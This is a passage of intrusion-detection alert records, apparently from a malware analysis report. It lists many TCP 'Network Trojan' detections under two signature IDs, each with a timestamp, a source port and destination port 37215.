                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.979728
                  SID:2829579
                  Source Port:45768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.478024
                  SID:2829579
                  Source Port:32962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.134906
                  SID:2829579
                  Source Port:56008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.482913
                  SID:2829579
                  Source Port:54156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.159669
                  SID:2835222
                  Source Port:53156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.980775
                  SID:2835222
                  Source Port:54516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.010263
                  SID:2835222
                  Source Port:54416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.068125
                  SID:2835222
                  Source Port:59364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.343615
                  SID:2835222
                  Source Port:53834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.748733
                  SID:2835222
                  Source Port:35432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.980831
                  SID:2835222
                  Source Port:57124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.701183
                  SID:2835222
                  Source Port:51186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.364468
                  SID:2829579
                  Source Port:51586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.799100
                  SID:2829579
                  Source Port:33616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771626
                  SID:2829579
                  Source Port:47862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.191107
                  SID:2835222
                  Source Port:60190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.461581
                  SID:2835222
                  Source Port:42856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.938789
                  SID:2829579
                  Source Port:51752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.473700
                  SID:2829579
                  Source Port:40406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.866986
                  SID:2829579
                  Source Port:60436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.469991
                  SID:2835222
                  Source Port:50774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.221493
                  SID:2829579
                  Source Port:58042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.223623
                  SID:2829579
                  Source Port:52680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.926715
                  SID:2835222
                  Source Port:41270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.784447
                  SID:2829579
                  Source Port:39946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.598670
                  SID:2835222
                  Source Port:42690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.726591
                  SID:2835222
                  Source Port:60726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.205582
                  SID:2835222
                  Source Port:34682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867031
                  SID:2829579
                  Source Port:41044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.736595
                  SID:2829579
                  Source Port:60462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.842656
                  SID:2835222
                  Source Port:34066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.870319
                  SID:2829579
                  Source Port:45800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.619310
                  SID:2829579
                  Source Port:52356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.273246
                  SID:2829579
                  Source Port:40968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2835222
                  Source Port:45786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.122738
                  SID:2835222
                  Source Port:56466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.087235
                  SID:2835222
                  Source Port:39654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.699441
                  SID:2835222
                  Source Port:34476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.937591
                  SID:2835222
                  Source Port:53594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.015604
                  SID:2835222
                  Source Port:47674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.342046
                  SID:2829579
                  Source Port:50864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.421673
                  SID:2829579
                  Source Port:35312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.051851
                  SID:2835222
                  Source Port:56538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.835787
                  SID:2835222
                  Source Port:47280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.794160
                  SID:2835222
                  Source Port:52746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.438982
                  SID:2829579
                  Source Port:53354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.839511
                  SID:2835222
                  Source Port:34128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.029316
                  SID:2829579
                  Source Port:57130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.632030
                  SID:2835222
                  Source Port:49508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.253247
                  SID:2829579
                  Source Port:55906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.784523
                  SID:2835222
                  Source Port:38628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.310052
                  SID:2829579
                  Source Port:58674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.563593
                  SID:2835222
                  Source Port:41370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.090625
                  SID:2835222
                  Source Port:49230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.383706
                  SID:2835222
                  Source Port:56316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.419943
                  SID:2835222
                  Source Port:50276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.599801
                  SID:2835222
                  Source Port:36684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.460773
                  SID:2835222
                  Source Port:42224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.895681
                  SID:2829579
                  Source Port:57518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.087235
                  SID:2835222
                  Source Port:41286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.583365
                  SID:2829579
                  Source Port:58974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.937799
                  SID:2835222
                  Source Port:57428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.063010
                  SID:2829579
                  Source Port:50066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.869440
                  SID:2835222
                  Source Port:47464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.520220
                  SID:2835222
                  Source Port:45158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.539034
                  SID:2835222
                  Source Port:35834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.002898
                  SID:2829579
                  Source Port:42598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.182553
                  SID:2835222
                  Source Port:60102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.852572
                  SID:2829579
                  Source Port:53546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.385643
                  SID:2829579
                  Source Port:36480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.320405
                  SID:2835222
                  Source Port:38232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.027011
                  SID:2829579
                  Source Port:34486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.530198
                  SID:2829579
                  Source Port:54524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.083120
                  SID:2829579
                  Source Port:57708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.880980
                  SID:2829579
                  Source Port:37434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.515772
                  SID:2829579
                  Source Port:34990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.770839
                  SID:2835222
                  Source Port:50960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.254772
                  SID:2829579
                  Source Port:49796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281648
                  SID:2829579
                  Source Port:50896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.682326
                  SID:2835222
                  Source Port:41126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417840
                  SID:2829579
                  Source Port:40960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.774106
                  SID:2829579
                  Source Port:42084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.453359
                  SID:2835222
                  Source Port:60670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.798485
                  SID:2829579
                  Source Port:44058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.101557
                  SID:2835222
                  Source Port:55808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.868909
                  SID:2829579
                  Source Port:42260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.537934
                  SID:2835222
                  Source Port:34072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.439575
                  SID:2829579
                  Source Port:54000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.794160
                  SID:2829579
                  Source Port:54614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.556731
                  SID:2829579
                  Source Port:40348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.187886
                  SID:2829579
                  Source Port:50380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.872861
                  SID:2829579
                  Source Port:57118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.971781
                  SID:2835222
                  Source Port:60582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.549149
                  SID:2835222
                  Source Port:54248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.154328
                  SID:2829579
                  Source Port:33004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.811605
                  SID:2835222
                  Source Port:44936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.754547
                  SID:2829579
                  Source Port:34166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.657451
                  SID:2835222
                  Source Port:53674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.237344
                  SID:2835222
                  Source Port:53382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.601358
                  SID:2829579
                  Source Port:35284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.647337
                  SID:2835222
                  Source Port:50600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.385644
                  SID:2835222
                  Source Port:39018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.812708
                  SID:2835222
                  Source Port:46006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.639022
                  SID:2835222
                  Source Port:60686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.587142
                  SID:2829579
                  Source Port:39566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302955
                  SID:2835222
                  Source Port:33216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.322147
                  SID:2829579
                  Source Port:60550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.014549
                  SID:2829579
                  Source Port:38130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.846155
                  SID:2835222
                  Source Port:56300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.430533
                  SID:2835222
                  Source Port:53270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.330025
                  SID:2835222
                  Source Port:37098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.876812
                  SID:2829579
                  Source Port:46056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.820956
                  SID:2829579
                  Source Port:60976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.952903
                  SID:2835222
                  Source Port:38074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.942131
                  SID:2829579
                  Source Port:39082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.517420
                  SID:2829579
                  Source Port:37024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.004386
                  SID:2835222
                  Source Port:56226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.159131
                  SID:2835222
                  Source Port:49886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.380846
                  SID:2835222
                  Source Port:50248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.929861
                  SID:2835222
                  Source Port:36806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.692447
                  SID:2835222
                  Source Port:35282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.190814
                  SID:2829579
                  Source Port:56244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.914738
                  SID:2835222
                  Source Port:58280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2835222
                  Source Port:32980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.322486
                  SID:2835222
                  Source Port:60714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.843538
                  SID:2835222
                  Source Port:44690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.407027
                  SID:2829579
                  Source Port:34778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.517321
                  SID:2829579
                  Source Port:56022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.959862
                  SID:2835222
                  Source Port:35128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.520739
                  SID:2835222
                  Source Port:58538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.348591
                  SID:2829579
                  Source Port:45362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.144044
                  SID:2829579
                  Source Port:41180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.308313
                  SID:2835222
                  Source Port:52396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.329184
                  SID:2835222
                  Source Port:41614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.587919
                  SID:2835222
                  Source Port:45024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.631449
                  SID:2835222
                  Source Port:34590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.119978
                  SID:2829579
                  Source Port:43166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.568702
                  SID:2829579
                  Source Port:39256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.854243
                  SID:2835222
                  Source Port:34970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905585
                  SID:2835222
                  Source Port:49914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.736564
                  SID:2835222
                  Source Port:49094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.238567
                  SID:2829579
                  Source Port:36068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.237897
                  SID:2835222
                  Source Port:48532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.937282
                  SID:2835222
                  Source Port:52256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.162688
                  SID:2829579
                  Source Port:35346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.492853
                  SID:2835222
                  Source Port:41312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.917453
                  SID:2835222
                  Source Port:42688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.058367
                  SID:2835222
                  Source Port:56846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.849786
                  SID:2835222
                  Source Port:49692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.119977
                  SID:2835222
                  Source Port:43310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.091003
                  SID:2829579
                  Source Port:33652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.800658
                  SID:2835222
                  Source Port:45256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.384643
                  SID:2835222
                  Source Port:43976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.802852
                  SID:2835222
                  Source Port:43794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.065687
                  SID:2829579
                  Source Port:54308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.041240
                  SID:2829579
                  Source Port:33494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.821130
                  SID:2835222
                  Source Port:34454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.985785
                  SID:2829579
                  Source Port:49688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.529010
                  SID:2829579
                  Source Port:40330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.766383
                  SID:2835222
                  Source Port:41140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.267264
                  SID:2835222
                  Source Port:33444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.429606
                  SID:2829579
                  Source Port:54738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.866292
                  SID:2829579
                  Source Port:49892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.012569
                  SID:2829579
                  Source Port:34398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.281691
                  SID:2829579
                  Source Port:55686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.662909
                  SID:2829579
                  Source Port:58502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.228376
                  SID:2829579
                  Source Port:55018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.957344
                  SID:2829579
                  Source Port:38066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.342847
                  SID:2829579
                  Source Port:50284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.156857
                  SID:2835222
                  Source Port:36692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.272369
                  SID:2829579
                  Source Port:47946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.616592
                  SID:2829579
                  Source Port:46540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.855166
                  SID:2829579
                  Source Port:35768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976996
                  SID:2829579
                  Source Port:59842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.105157
                  SID:2835222
                  Source Port:50410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.662238
                  SID:2835222
                  Source Port:56472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.683059
                  SID:2835222
                  Source Port:55358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.329520
                  SID:2835222
                  Source Port:51212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623389
                  SID:2835222
                  Source Port:54964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.668696
                  SID:2829579
                  Source Port:56912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.030599
                  SID:2829579
                  Source Port:43588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204565
                  SID:2829579
                  Source Port:37816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.009015
                  SID:2835222
                  Source Port:37872
